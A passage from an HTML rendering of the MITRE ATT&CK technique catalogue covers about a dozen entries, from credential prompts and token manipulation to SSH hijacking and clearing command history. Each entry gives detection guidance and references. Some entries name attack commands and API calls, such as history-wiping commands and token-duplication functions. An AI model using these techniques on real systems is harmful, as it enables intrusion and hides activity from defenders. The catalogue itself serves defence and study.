<p>Adversaries can prompt a user for a number of reasons that mimic normal usage, such as a fake installer requiring additional access or a fake malware removal suite. (Citation: OSX Malware Exploits MacKeeper)</p>
</div>
<div class="paragraph">
<p>Detection: This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to detect. Monitor process execution for unusual programs as well as AppleScript that could be used to prompt users for credentials.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: User interface, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 898. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1141">https://attack.mitre.org/wiki/Technique/T1141</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/">https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html">https://baesystemsai.blogspot.com/2015/06/new-mac-os-malware-exploits-mackeeper.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_shared_webroot_t1051"><a class="anchor" href="#_shared_webroot_t1051"></a><a class="link" href="#_shared_webroot_t1051">Shared Webroot - T1051</a></h3>
<div class="paragraph">
<p>Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website&#8217;s webroot or Web content directory and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.</p>
</div>
<div class="paragraph">
<p>This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited.</p>
</div>
<div class="paragraph">
<p>Detection: Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>System Requirements: Shared webroot directory on remote system</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 899. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1051">https://attack.mitre.org/wiki/Technique/T1051</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_indicator_blocking_t1054"><a class="anchor" href="#_indicator_blocking_t1054"></a><a class="link" href="#_indicator_blocking_t1054">Indicator Blocking - T1054</a></h3>
<div class="paragraph">
<p>An adversary may attempt to block indicators or events from leaving the host machine. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process or creating a host-based firewall rule to block traffic to a specific server.</p>
</div>
<div class="paragraph">
<p>Detection: Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.</p>
</div>
<div class="paragraph">
<p>Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Sensor health and status, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Anti-virus, Log analysis, Host intrusion prevention systems</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 900. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1054">https://attack.mitre.org/wiki/Technique/T1054</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_exfiltration_over_physical_medium_t1052"><a class="anchor" href="#_exfiltration_over_physical_medium_t1052"></a><a class="link" href="#_exfiltration_over_physical_medium_t1052">Exfiltration Over Physical Medium - T1052</a></h3>
<div class="paragraph">
<p>In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor file access on removable media. Detect processes that execute when removable media are mounted.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Data loss prevention, File monitoring</p>
</div>
<div class="paragraph">
<p>System Requirements: Presence of physical medium or device</p>
</div>
<div class="paragraph">
<p>Requires Network: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 901. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1052">https://attack.mitre.org/wiki/Technique/T1052</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_access_token_manipulation_t1134"><a class="anchor" href="#_access_token_manipulation_t1134"></a><a class="link" href="#_access_token_manipulation_t1134">Access Token Manipulation - T1134</a></h3>
<div class="paragraph">
<p>Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command &lt;code&gt;runas&lt;/code&gt;. (Citation: Microsoft runas)</p>
</div>
<div class="paragraph">
<p>Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system. (Citation: Pentestlab Token Manipulation)</p>
</div>
<div class="paragraph">
<p>Access tokens can be leveraged by adversaries through three methods: (Citation: BlackHat Atkinson Winchester Token Manipulation)</p>
</div>
<div class="paragraph">
<p>'''Token Impersonation/Theft''' - An adversary creates a new access token that duplicates an existing token using &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;. The token can then be used with &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to allow the calling thread to impersonate a logged on user&#8217;s security context, or with &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the impersonated token to a thread. This is useful for when the target user has a non-network logon session on the system.</p>
</div>
<div class="paragraph">
<p>'''Create Process with a Token''' - An adversary creates a new access token with &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt; and uses it with &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; to create a new process running under the security context of the impersonated user. This is useful for creating a new process under the security context of a different user.</p>
</div>
<div class="paragraph">
<p>'''Make and Impersonate Token''' - An adversary has a username and password but the user is not logged onto the system. The adversary can then create a logon session for the user using the &lt;code&gt;LogonUser&lt;/code&gt; function. The function will return a copy of the new session&#8217;s access token and the adversary can use &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the token to a thread.</p>
</div>
<div class="paragraph">
<p>Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account.</p>
</div>
<div class="paragraph">
<p>Metasploits Meterpreter payload allows arbitrary token manipulation and uses token impersonation to escalate privileges. (Citation: Metasploit access token) The Cobalt Strike beacon payload allows arbitrary token impersonation and can also create tokens. (Citation: Cobalt Strike Access Token)</p>
</div>
<div class="paragraph">
<p>Detection: If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the &lt;code&gt;runas&lt;/code&gt; command. Detailed command-line logging is not enabled by default in Windows. (Citation: Microsoft Command-line Logging)</p>
</div>
<div class="paragraph">
<p>If an adversary is using a payload that calls the Windows token APIs directly, analysts can detect token manipulation only through careful analysis of user network activity, examination of running processes, and correlation with other endpoint and network behavior.</p>
</div>
<div class="paragraph">
<p>There are many Windows API calls a payload can take advantage of to manipulate access tokens (e.g., &lt;code&gt;LogonUser&lt;/code&gt; (Citation: Microsoft LogonUser), &lt;code&gt;DuplicateTokenEx&lt;/code&gt; (Citation: Microsoft DuplicateTokenEx), and &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; (Citation: Microsoft ImpersonateLoggedOnUser)). Please see the referenced Windows API pages for more information.</p>
</div>
<div class="paragraph">
<p>Query systems for process and thread token information and look for inconsistencies such as user owns processes impersonating the local SYSTEM account. (Citation: BlackHat Atkinson Winchester Token Manipulation)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Access Tokens</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>Contributors: Tom Ueltschi @c_APT_ure, Travis Smith, Tripwire, Jared Atkinson, @jaredcatkinson, Robby Winchester, @robwinchester3</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 902. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1134">https://attack.mitre.org/wiki/Technique/T1134</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/bb490994.aspx">https://technet.microsoft.com/en-us/library/bb490994.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://pentestlab.blog/2017/04/03/token-manipulation/">https://pentestlab.blog/2017/04/03/token-manipulation/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.offensive-security.com/metasploit-unleashed/fun-incognito/">https://www.offensive-security.com/metasploit-unleashed/fun-incognito/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/">https://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing">https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/aa378184(v=vs.85).aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/aa446617(v=vs.85).aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx">https://msdn.microsoft.com/en-us/library/windows/desktop/aa378612(v=vs.85).aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf">https://www.blackhat.com/docs/eu-17/materials/eu-17-Atkinson-A-Process-Is-No-One-Hunting-For-Token-Manipulation.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_system_time_discovery_t1124"><a class="anchor" href="#_system_time_discovery_t1124"></a><a class="link" href="#_system_time_discovery_t1124">System Time Discovery - T1124</a></h3>
<div class="paragraph">
<p>The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. (Citation: MSDN System Time) (Citation: Technet Windows Time Service)</p>
</div>
<div class="paragraph">
<p>An adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with Net on Windows by performing &lt;code&gt;net time \\hostname&lt;/code&gt; to gather the system time on a remote system. The victim&#8217;s time zone may also be inferred from the current system time or gathered by using &lt;code&gt;w32tm /tz&lt;/code&gt;. (Citation: Technet Windows Time Service) The information could be useful for performing other techniques, such as executing a file with a Scheduled Task (Citation: RSA EU12 They&#8217;re Inside), or to discover locality information based on time zone to assist in victim targeting.</p>
</div>
<div class="paragraph">
<p>Detection: Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters, API monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 903. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1124">https://attack.mitre.org/wiki/Technique/T1124</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/ms724961.aspx">https://msdn.microsoft.com/ms724961.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings">https://technet.microsoft.com/windows-server-docs/identity/ad-ds/get-started/windows-time-service/windows-time-service-tools-and-settings</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-209%20rivner%20schwartz.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-209%20rivner%20schwartz.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_clear_command_history_t1146"><a class="anchor" href="#_clear_command_history_t1146"></a><a class="link" href="#_clear_command_history_t1146">Clear Command History - T1146</a></h3>
<div class="paragraph">
<p>macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they&#8217;ve done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user&#8217;s home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The benefit of this is that it allows users to go back to commands they&#8217;ve used before in different sessions. Since everything typed on the command-line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appear in these logs such as &lt;code&gt;unset HISTFILE&lt;/code&gt;, &lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;, &lt;code&gt;history -c&lt;/code&gt;, &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Detection: User authentication, especially via remote terminal services like SSH, without new entries in that user&#8217;s &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the modification of the HISTFILE and HISTFILESIZE environment variables or the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file are indicators of suspicious activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs, File monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Log analysis, Host forensic analysis</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 904. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1146">https://attack.mitre.org/wiki/Technique/T1146</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_execution_through_module_load_t1129"><a class="anchor" href="#_execution_through_module_load_t1129"></a><a class="link" href="#_execution_through_module_load_t1129">Execution through Module Load - T1129</a></h3>
<div class="paragraph">
<p>The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess(), LoadLibrary(), etc. of the Win32 API. (Citation: Wikipedia Windows Library Files)</p>
</div>
<div class="paragraph">
<p>The module loader can load DLLs:</p>
</div>
<div class="paragraph">
<p>*via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;</p>
</div>
<div class="paragraph">
<p>*via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);</p>
</div>
<div class="paragraph">
<p>*via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;</p>
</div>
<div class="paragraph">
<p>*via &lt;code&gt;&lt;file name="filename.extension" loadFrom="fully-qualified or relative pathname"&gt;&lt;/code&gt; in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.</p>
</div>
<div class="paragraph">
<p>Adversaries can use this functionality as a way to execute arbitrary code on a system.</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring DLL module loads may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances, since benign use of Windows modules load functions are common and may be difficult to distinguish from malicious behavior. Legitimate software will likely only need to load routine, bundled DLL modules or Windows system DLLs such that deviation from known module loads may be suspicious. Limiting DLL module loads to &lt;code&gt;%SystemRoot%&lt;/code&gt; and &lt;code&gt;%ProgramFiles%&lt;/code&gt; directories will protect against module loads from unsafe paths.</p>
</div>
<div class="paragraph">
<p>Correlation of other events with behavior surrounding module loads using API monitoring and suspicious DLLs written to disk will provide additional context to an event that may assist in determining if it is due to malicious behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process Monitoring, API monitoring, File monitoring, DLL monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Stefan Kanthak</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 905. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1129">https://attack.mitre.org/wiki/Technique/T1129</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Microsoft%20Windows%20library%20files">https://en.wikipedia.org/wiki/Microsoft%20Windows%20library%20files</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ssh_hijacking_t1184"><a class="anchor" href="#_ssh_hijacking_t1184"></a><a class="link" href="#_ssh_hijacking_t1184">SSH Hijacking - T1184</a></h3>
<div class="paragraph">
<p>Secure Shell (SSH) is a standard means of remote access on Linux and Mac systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.</p>
</div>
<div class="paragraph">
<p>In order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent&#8217;s socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial. (Citation: Slideshare Abusing SSH) (Citation: SSHjack Blackhat) (Citation: Clockwork SSH Agent Hijacking) Compromising the SSH agent also provides access to intercept SSH credentials. (Citation: Welivesecurity Ebury SSH)</p>
</div>
<div class="paragraph">
<p>SSH Hijacking differs from use of Remote Services because it injects into an existing SSH session rather than creating a new session using Valid Accounts.</p>
</div>
<div class="paragraph">
<p>Detection: Use of SSH may be legitimate, depending upon the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with SSH. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time. Also monitor user SSH-agent socket files being used by different users.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, root</p>
</div>
<div class="paragraph">
<p>System Requirements: SSH service enabled, trust relationships configured, established connections</p>
</div>
<div class="paragraph">
<p>Contributors: Anastasios Pingios</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 906. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1184">https://attack.mitre.org/wiki/Technique/T1184</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219">https://www.slideshare.net/morisson/mistrusting-and-abusing-ssh-13526219</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf">https://www.blackhat.com/presentations/bh-usa-05/bh-us-05-boileau.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.clockwork.com/news/2012/09/28/602/ssh%20agent%20hijacking">https://www.clockwork.com/news/2012/09/28/602/ssh%20agent%20hijacking</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/">https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_install_root_certificate_t1130"><a class="anchor" href="#_install_root_certificate_t1130"></a><a class="link" href="#_install_root_certificate_t1130">Install Root Certificate - T1130</a></h3>
<div class="paragraph">
<p>Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root&#8217;s chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.</p>
</div>
<div class="paragraph">
<p>Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)</p>
</div>
<div class="paragraph">
<p>Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)</p>
</div>
<div class="paragraph">
<p>Detection: A system&#8217;s root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity. Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present.</p>
</div>
<div class="paragraph">
<p>Installed root certificates are located in the Registry: &lt;code&gt;HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates&lt;/code&gt;. There is a subset of root certificates that are consistent across Windows systems and can be used for comparison: (Citation: Tripwire AppUNBlocker)
*18F7C1FCC3090203FD5BAA2F861A754976C8DD25
*245C97DF7514E7CF2DF8BE72AE957B9E04741E85
*3B1EFD3A66EA28B16697394703A72CA340A05BD5
*7F88CD7223F3C813818C994614A89C99FA3B5247
*8F43288AD272F3103B6FB1428485EA3014C0BCFE
*A43489159A520F0D93D032CCAF37E7FE20A8B419
*BE36A4562FB2EE05DBB3D32323ADF445084ED656
*CDD4EEAE6000AC7F40C3802C171E30148030C072</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: SSL/TLS inspection, Digital Certificate Logs</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Digital Certificate Validation</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<div class="paragraph">
<p>Contributors: Itzik Kotler, SafeBreach, Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 907. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1130">https://attack.mitre.org/wiki/Technique/T1130</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Root%20certificate">https://en.wikipedia.org/wiki/Root%20certificate</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf">http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/">https://www.kaspersky.com/blog/lenovo-pc-with-adware-superfish-preinstalled/7712/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/">https://www.tripwire.com/state-of-security/off-topic/appunblocker-bypassing-applocker/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_data_transfer_size_limits_t1030"><a class="anchor" href="#_data_transfer_size_limits_t1030"></a><a class="link" href="#_data_transfer_size_limits_t1030">Data Transfer Size Limits - T1030</a></h3>
<div class="paragraph">
<p>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</p>
</div>
<div class="paragraph">
<p>Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring</p>
</div>
<div class="paragraph">
<p>Requires Network: Yes</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 908. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1030">https://attack.mitre.org/wiki/Technique/T1030</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf">https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_bash_profile_and_bashrc_t1156"><a class="anchor" href="#_bash_profile_and_bashrc_t1156"></a><a class="link" href="#_bash_profile_and_bashrc_t1156">.bash_profile and .bashrc - T1156</a></h3>
<div class="paragraph">
